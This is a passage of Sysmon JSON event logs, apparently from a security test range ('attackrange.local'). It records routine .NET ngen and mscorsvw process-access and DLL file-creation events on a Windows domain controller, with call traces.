C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:41.528","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0509-5F25-0000-001026001300}","TargetProcessId":"4240","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8073,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:46.153\r\nProcessGuid: {A837DB8D-0509-5F25-0000-001026001300}\r\nProcessId: 4240\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1090-0\\System.Core.dll\r\nCreationUtcTime: 2020-08-01 06:00:46.153","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:46.153","ProcessGuid":"{A837DB8D-0509-5F25-0000-001026001300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\1090-0\\System.Core.dll","CreationUtcTime":"2020-08-01 06:00:46.153","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8074,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.325\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-001050051300}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.325","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"3272","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-001050051300}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ae03(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c43d(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+c4ad(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8075,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.325\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-001050051300}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.325","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-001050051300}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8076,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.325\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-001050051300}\r\nTargetProcessId: 4604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.325","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-001050051300}","TargetProcessId":"4604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8077,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:46.762\r\nProcessGuid: {A837DB8D-050E-5F25-0000-001050051300}\r\nProcessId: 4604\r\nImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\11fc-0\\System.Configuration.dll\r\nCreationUtcTime: 2020-08-01 06:00:46.762","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:46.762","ProcessGuid":"{A837DB8D-050E-5F25-0000-001050051300}","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Temp\\11fc-0\\System.Configuration.dll","CreationUtcTime":"2020-08-01 06:00:46.762","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8078,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.809\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 2496\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-00105B371100}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.809","SourceProcessGUID":"{A837DB8D-040F-5F25-0000-0010414F0B00}","SourceProcessId":"2732","SourceThreadId":"2496","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-00105B371100}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\wow64.dll+10c0b|C:\\Windows\\System32\\wow64.dll+10499|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+92bd7|C:\\Windows\\SYSTEM32\\ntdll.dll+c7734|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6fa4c(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d90a8(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+d7d7c(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b37e(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+73b7(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a4c6(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+a642(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+ad30(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+abce(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+af4a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+b1b4(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8f0a(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+8fe3(wow64)|C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvc.dll+9082(wow64)","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8079,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.809\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04D4-5F25-0000-00105B371100}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.809","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04D4-5F25-0000-00105B371100}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8080,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.825\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-00104C091300}\r\nTargetProcessId: 752\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:46.825","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-050E-5F25-0000-00104C091300}","TargetProcessId":"752","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8081,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:46.872\r\nSourceProcessGUID: {A837DB8D-040F-5F25-0000-0010414F0B00}\r\nSourceProcessId: 2732\r\nSourceThreadId: 3272\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-050E-5F25-0000-00109B0C1300}\r\nTargetProcessId: 2820\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 